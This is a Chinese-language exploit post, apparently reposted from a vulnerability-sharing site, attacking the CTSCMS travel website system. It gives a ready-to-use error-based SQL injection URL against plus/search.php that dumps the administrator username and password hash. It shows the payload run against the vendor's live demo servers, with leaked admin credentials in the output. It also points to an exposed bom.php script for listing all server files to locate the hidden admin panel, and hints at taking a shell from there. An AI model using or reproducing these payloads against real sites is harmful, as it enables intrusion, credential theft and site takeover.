转自:http://www.0day5.com/?p=546
中国旅游服务网站管理系统(CTSCMS.COM)是专业的旅游网站程序源码、旅游网站系统、旅游网站模板、旅游网站建设服务提供商,专注于旅游电子商务发展的服务于旅行社和旅游。。。
好吧~CTSCMS 其实就是使用织梦的模版,然后就是自己的商业版了~居然还有出500大洋去购买的
查看更新日期
data/admin/ver.txt
一般都是2010年的,或许还可以直接getshell
exp:
1
|
http:
//www.0day5.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
|
默认后台地址是
http://www.0day5.com/ctscms
找不到后台的也好办,在查看源码的时候发现一个有趣的东西
bom.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
<?php
//remove the utf-8 boms
//by magicbug at gmail dot com
if
(isset(
$_GET
[
'dir'
])){
//config the basedir
$basedir
=
$_GET
[
'dir'
];
}
else
{
$basedir
=
'.'
;
}
$auto
= 1;
checkdir(
$basedir
);
function
checkdir(
$basedir
){
if
(
$dh
= opendir(
$basedir
)) {
while
((
$file
= readdir(
$dh
)) !== false) {
if
(
$file
!=
'.'
&&
$file
!=
'..'
){
if
(!
is_dir
(
$basedir
.
"/"
.
$file
)) {
echo
"filename: $basedir/$file "
;
echo
checkBOM(
"$basedir/$file"
).
" <br>"
;
}
else
{
$dirname
=
$basedir
.
"/"
.
$file
;
checkdir(
$dirname
);
}
}
}
closedir
(
$dh
);
}
}
function
checkBOM (
$filename
) {
global
$auto
;
$contents
=
file_get_contents
(
$filename
);
$charset
[1] =
substr
(
$contents
, 0, 1);
$charset
[2] =
substr
(
$contents
, 1, 1);
$charset
[3] =
substr
(
$contents
, 2, 1);
if
(ord(
$charset
[1]) == 239 && ord(
$charset
[2]) == 187 && ord(
$charset
[3]) == 191) {
if
(
$auto
== 1) {
$rest
=
substr
(
$contents
, 3);
rewrite (
$filename
,
$rest
);
return
(
"<font color=red>BOM found, automatically removed.</font>"
);
}
else
{
return
(
"<font color=red>BOM found.</font>"
);
}
}
else
return
(
"BOM Not Found."
);
}
function
rewrite (
$filename
,
$data
) {
$filenum
=
fopen
(
$filename
,
"w"
);
flock
(
$filenum
, LOCK_EX);
fwrite(
$filenum
,
$data
);
fclose(
$filenum
);
}
?>
|
可以列出全部文件,嘿嘿~然后你懂的,找不到的时候就实时
http://www.0day5.com/bom.php
官方演示版:
1
|
http:
//c.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
|
Error infos: Duplicate entry '1|ctscms|d7f10e7cca0693eb8561' for key 'group_key'
1
|
http:
//s.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
|
Error infos: Duplicate entry '1|ctscms|c6364c485d55bb9df83a' for key 'group_key'
后台拿shell就不解释了~